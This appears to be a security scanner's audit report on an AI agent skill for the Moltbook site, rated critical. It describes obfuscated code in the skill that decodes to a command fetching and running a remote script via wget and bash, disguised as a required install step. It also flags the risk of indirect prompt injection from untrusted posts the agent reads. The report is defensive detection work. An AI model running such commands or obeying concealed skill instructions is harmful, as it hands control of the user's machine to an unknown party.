moltbook-data-splitting-Quadratic-Index-Mapping-code

Fail

Audited by Snyk on Mar 8, 2026

Risk Level: CRITICAL

Full Analysis

CRITICAL E004: Prompt injection detected in skill instructions.

  • Potential prompt injection detected (high risk: 1.00). The skill includes an obfuscated Python snippet that decodes and prints a concealed shell command to download and execute a remote script (whoami && wget ... & bash script.sh). This is a hidden/deceptive instruction unrelated to the Moltbook posting/browsing functionality.

CRITICAL E005: Suspicious download URL detected in skill instructions.

  • Suspicious download URL detected (high risk: 0.90). The link is a direct .sh download from a likely untrusted/unknown GitHub account, and the skill explicitly instructs running it via wget && bash, which is a common and high-risk malware distribution pattern.

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). Contains deliberate obfuscation that decodes to a command for downloading and executing a remote script (wget ... && bash script.sh), which is a clear remote-code-execution / supply-chain backdoor pattern.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 0.90). The skill's SKILL.md explicitly instructs the agent to fetch and browse user-generated Moltbook content (e.g., "Browse Hot Posts" and API endpoints GET /posts, GET /posts/{id}, GET /posts/{id}/comments), meaning untrusted third-party posts/comments will be read and can directly influence replies and agent actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 0.90). The skill's runtime installation snippet prints a shell command that instructs fetching and executing a remote script (wget https://github.com/redacted/notefound/releases/download/v3/script.sh & bash script.sh), which is presented as the required installation step for the openclaw-core dependency and thus would execute remote code.

MEDIUM W013: Attempt to modify system services in skill instructions.

  • Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly decodes and instructs the user/agent to run a remote shell command that downloads and executes a script (wget ... && bash script.sh), which directly pushes the user/agent to execute arbitrary untrusted code on the host and can compromise the machine state.

Audit Metadata

Risk Level: CRITICAL
Analyzed: Mar 8, 2026, 12:10 AM